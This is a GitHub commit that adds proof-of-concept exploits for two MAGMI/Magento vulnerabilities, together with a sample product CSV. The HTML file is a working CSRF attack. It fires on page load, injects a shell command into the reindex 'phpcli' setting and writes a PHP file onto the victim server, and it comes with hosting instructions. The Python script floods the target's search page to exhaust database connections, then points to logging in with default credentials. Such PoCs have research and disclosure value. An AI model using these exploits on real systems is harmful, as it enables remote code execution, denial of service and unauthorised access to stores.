Skip to content

Commit 16b1ce8

Browse files
captainwellscaptainwells
committed
Adding MAGMI PoCs
1 parent f716e74 commit 16b1ce8

File tree

3 files changed

+107
-0
lines changed

3 files changed

+107
-0
lines changed

MAGMI/cve-2020-5776/csrf_poc.html

+48
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,48 @@
1+
<!DOCTYPE html>
2+
<html>
3+
- Host this file anywhere on internet<br>
4+
- Replace [TARGET] by the vulnerable Mgento domain<br>
5+
- Adjust the MAGMI path if you have a custom path<br>
6+
- Open the file in a browser as a victim while being authenticated to MAGMI<br>
7+
- A new executable file "info.php" will be created on the server<br><br>
8+
9+
<body onload=run()>
10+
<script>
11+
// Replace [TARGET] with appropriate target url
12+
var targetUrl = "http://[TARGET]";
13+
14+
function run() {
15+
var xhttp = new XMLHttpRequest();
16+
var data = "profile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[http%3A%2F%2F10.254.130.95%2Feg%2Fsample.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=";
17+
var url = targetUrl + "/magmi/web/magmi_saveprofile.php";
18+
var method = "POST";
19+
20+
xhttp.open(method, url);
21+
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
22+
xhttp.withCredentials = true;
23+
// Expect a security error related to CORS, but request is still sent
24+
xhttp.onerror = phase2;
25+
xhttp.send(data);
26+
}
27+
28+
function phase2() {
29+
var xhttp = new XMLHttpRequest();
30+
var data = "engine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update";
31+
var url = targetUrl + "/magmi/web/magmi_run.php";
32+
var method = "POST";
33+
34+
xhttp.open(method, url);
35+
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
36+
xhttp.withCredentials = true;
37+
// Expect a security error related to CORS, but request is still sent
38+
xhttp.onerror = phase3;
39+
xhttp.send(data);
40+
}
41+
42+
function phase3() {
43+
document.body.append("Success: A new file info.php should have been created here : " + targetUrl + "/magmi/web/info.php")
44+
}
45+
</script>
46+
</body>
47+
48+
</html>

MAGMI/cve-2020-5776/sample.csv

+34
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
sku,attribute_set,type,store,websites,configurable_attributes,color,full_size,name,description,short_description,full_features,att_ean,price,special_price,rrp,qty,is_in_stock,manage_stock,use_config_manage_stock,status,visibility,weight,category_ids,tax_class_id,thumbnail,small_image,image,media_gallery,arw_brand
2+
AF001WHIT2XL,Default,simple,admin,Default,"color,full_size",White,2XL,Chef's kit jacket with press stud (DD16)-White-2XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
3+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
4+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
5+
AF001WHIT2XS,Default,simple,admin,Default,"color,full_size",White,2XS,Chef's kit jacket with press stud (DD16)-White-2XS,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
6+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
7+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
8+
AF001WHIT3XL,Default,simple,admin,Default,"color,full_size",White,3XL,Chef's kit jacket with press stud (DD16)-White-3XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
9+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
10+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
11+
AF001WHIT4XL,Default,simple,admin,Default,"color,full_size",White,4XL,Chef's kit jacket with press stud (DD16)-White-4XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
12+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
13+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
14+
AF001WHITL,Default,simple,admin,Default,"color,full_size",White,L,Chef's kit jacket with press stud (DD16)-White-L,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
15+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
16+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
17+
AF001WHITM,Default,simple,admin,Default,"color,full_size",White,M,Chef's kit jacket with press stud (DD16)-White-M,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
18+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
19+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
20+
AF001WHITS,Default,simple,admin,Default,"color,full_size",White,S,Chef's kit jacket with press stud (DD16)-White-S,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
21+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
22+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
23+
AF001WHITXL,Default,simple,admin,Default,"color,full_size",White,XL,Chef's kit jacket with press stud (DD16)-White-XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
24+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
25+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
26+
AF001WHITXS,Default,simple,admin,Default,"color,full_size",White,XS,Chef's kit jacket with press stud (DD16)-White-XS,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
27+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
28+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,,Kustom Kit
29+
AF001BLAC2XL,Default,simple,admin,Default,"color,full_size",Black,2XL,Chef's kit jacket with press stud (DD16)-Black-2XL,"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
30+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
31+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,Not Visible Individually,0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg,,Kustom Kit
32+
AF001,Default,configurable,admin,Default,"color,full_size",,,Chef's kit jacket with press stud (DD16),"Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
33+
","Made in 200gsm Poly/Cotton with 10 stainless steel press studs. Best value. Washing Instructions: 65 degree industrial wash.
34+
","Stainless steel press studs One way fastening Industrial wash Fabric:65% Polyester, 35% Cotton Weight:200gsm",,7.95,,,100,1,1,1,1,"Catalog, Search",0,"32,33",None,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg,/Wetransfer-b10265/AFD by Dennys/AF001_LS1.jpg::White;/Wetransfer-b10265/AFD by Dennys/AF011_LS1.jpg::Black;/wetransfer-b10265/Alexandra/AX001_LS1.jpg;/wetransfer-b10265/Alexandra/AX005_LS1.jpg;,Kustom Kit

MAGMI/cve-2020-5777/auth_bypass.py

+25
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,25 @@
1+
import asyncio
2+
import aiohttp
3+
4+
# Usage : python3 ./http_flood.py
5+
# Response code 503 indicates a potential successful "Too many connections" error
6+
# While the Db connection is down, you can access http://[TARGET]/magmi/web/magmi.php
7+
# whith default credential "magmi:magmi" (Authorization: Basic bWFnbWk6bWFnbWk=)
8+
# Tested on a AWS t2.medium with max_connection = 75 and PHP-FPM pm-max_children = 100
9+
10+
# Replace [TARGET] with your Magento domain
11+
url = "http://[TARGET]/catalogsearch/result/?q=e"
12+
13+
async def get(url):
14+
try:
15+
async with aiohttp.ClientSession() as session:
16+
async with session.get(url=url) as response:
17+
print("Got url {} with response code {}.".format(url, response.status))
18+
except Exception as e:
19+
print("Unable to get url {} due to error {}.".format(url, e.__class__))
20+
21+
async def main():
22+
ret = await asyncio.gather(*[get(url) for _ in range(1000)])
23+
print("Finalized all. ret is a list of len {} outputs.".format(len(ret)))
24+
25+
asyncio.run(main())

0 commit comments

Comments
 (0)